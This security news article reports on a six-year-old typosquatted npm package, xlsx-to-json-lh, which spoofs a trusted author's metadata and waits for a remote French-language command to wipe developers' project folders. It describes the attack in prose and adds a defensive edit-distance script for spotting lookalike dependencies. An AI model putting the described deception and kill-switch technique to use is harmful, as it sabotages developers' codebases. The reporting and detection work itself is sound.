
In a recent revelation, Socket’s Threat Research Team has uncovered a stealthy npm supply chain attack leveraging typosquatting and remote code execution. The malicious package, named xlsx-to-json-lh, impersonates the legitimate and widely used Excel-to-JSON converter xlsx-to-json-lc — a subtle change of just one letter. Yet the consequences are anything but minor.
“The package remained undetected on npm for six years before discovery,” Socket reports. As of publication, the package remains live on the registry, prompting urgent calls for its removal.
Unlike obvious malware, xlsx-to-json-lh cleverly masquerades as a legitimate module. It actually performs the expected conversion function, allowing it to pass basic functionality tests. But behind the scenes, it imports a secondary payload that connects to a command and control (C2) server — waiting silently for a kill-switch command.
The most dangerous part? No user interaction is needed beyond importing the module. Once loaded, the payload listens for a command labeled “remise à zéro” — French for “reset to zero.” Upon receiving it, the malware recursively deletes the entire project directory, including source files, .git folders, node_modules, configuration files, and everything else in its path.
“Recovery is virtually impossible without external backups,” warns the Socket team.
To fool developers, the malicious package retains the original author’s metadata, mimicking trusted author rahil471 while introducing a new maintainer with the npm alias leonhard. This technique exploits developers’ reliance on metadata for trust signals:
“Developers see the trusted author name and assume safety.”
The package.json file presents this facade seamlessly, offering no overt red flags to the untrained eye — making this attack particularly insidious.
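The one-letter gap between xlsx-to-json-lh and xlsx-to-json-lc is exactly what an edit-distance check catches. The Node.js script below is an added example, not code from Socket's report; it flags any dependency in a package.json that sits within one edit of a name on a trusted allowlist, and the sample package.json and allowlist are constructed.

```javascript
// Added example, not from Socket's report: flag dependencies whose names are
// within one edit of a trusted package name (xlsx-to-json-lh vs xlsx-to-json-lc).

// Levenshtein distance between two package names.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,        // deletion
        dp[i][j - 1] + 1,        // insertion
        dp[i - 1][j - 1] + cost  // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

// Merge dependencies and devDependencies from a parsed package.json.
function collectDeps(pkg) {
  return { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
}

// Report every dependency that is close to, but not exactly, a trusted name.
// `trusted` is an allowlist you maintain for your own projects.
function findTyposquats(deps, trusted, maxDistance = 1) {
  const findings = [];
  for (const name of Object.keys(deps)) {
    for (const good of trusted) {
      if (name === good) continue;
      const distance = editDistance(name, good);
      if (distance <= maxDistance) findings.push({ name, lookalike: good, distance });
    }
  }
  return findings;
}

// Constructed sample package.json mirroring the case in the article.
const samplePackageJson = {
  name: "report-builder",
  dependencies: { "xlsx-to-json-lh": "^1.0.0", express: "^4.18.0" },
  devDependencies: { jest: "^29.0.0" },
};
const trustedNames = ["xlsx-to-json-lc", "express", "jest"]; // constructed allowlist

for (const f of findTyposquats(collectDeps(samplePackageJson), trustedNames)) {
  console.log(`suspicious: ${f.name} is ${f.distance} edit from ${f.lookalike}`);
}
```

Run it against a real project by replacing the constructed object with `JSON.parse(fs.readFileSync("package.json", "utf8"))`; the allowlist should come from your lockfile review, not from the package under test.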
Socket researchers identified strong indicators pointing to a French-speaking attacker. The maintainer’s email address ends in .fr, and the destructive trigger command is written in French. Moreover, the malware uses socket.io-client to maintain a persistent WebSocket connection to a Heroku-based server.
Once connected, it silently awaits orders to detonate the codebase.
The simplicity and scale of this attack are what make it terrifying. Imagine a developer with several project folders infected across their environment.
With one remote command, three projects — and potentially years of work — are erased in seconds. As Socket illustrates:
“20 developers with 2-3 infected projects each means 40-60 codebases destroyed instantly.”